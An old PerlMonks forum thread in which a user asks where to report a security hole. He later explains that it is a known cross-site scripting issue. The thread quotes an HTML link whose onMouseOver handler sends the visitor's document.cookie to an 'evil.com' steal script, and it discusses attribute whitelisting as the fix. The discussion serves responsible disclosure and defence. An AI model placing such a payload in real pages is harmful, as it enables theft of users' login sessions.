I've discovered a security hole in the current Perl Monks website.

 Now - where do I report this?

 I know the code behind the site is derived from that on Everything, so I'm reasonably sure that it would apply to their site also. (But without having an account there it's hard to verify).

 Clearly I do not wish to post details out in the public - so I'm asking this question here.

 You can contact me in many ways - even using my GPG Key if you wish.

 Interesting problem: I wish to report the issue to somebody with power to fix it (quickly) and can verify who I am. How do I trust the person who contacts me is who they say they are ..? ;)

Steve
---
steve.org.uk

Replies are listed 'Best First'.
Re: Where to report a security hole?
by data64 (Chaplain) on Mar 14, 2003 at 22:23 UTC

    If it is urgent, you could msg the gods.

    Just a tongue-tied, twisted, earth-bound misfit. -- Pink Floyd

[reply]

       Thanks - It turns out this was a known issue which had been discussed before.

       I was referring to malicious links being able to steal your login cookie via a link of the following form:

      <a href="http://www.some.com/"
  onMouseOver="document.location='http://evil.com/steal.cgi?id=' +
   document.cookie;">Link Text</a>

       For example

       This only works upon personal node apparently, so it's not considered a problem.

       Update: I guess the general solution to this problem from a CGI filtering point of view is to remove all attributes from HTML tags which aren't explicitly allowed.

       Failing that you could filter out the 'obvious' dangerous ones - But you'd probably miss quite a few

      Steve
      ---
      steve.org.uk
[reply]

        I'm not a web guy, but my understanding is that this is why so many monks have javascript disabled for this site. You might visit Petruchio's node if you wish to see a friendly warning of this sort of attack.

        "The dead do not recognize context" -- Kai, Lexx
[reply]

Back to Perl Monks Discussion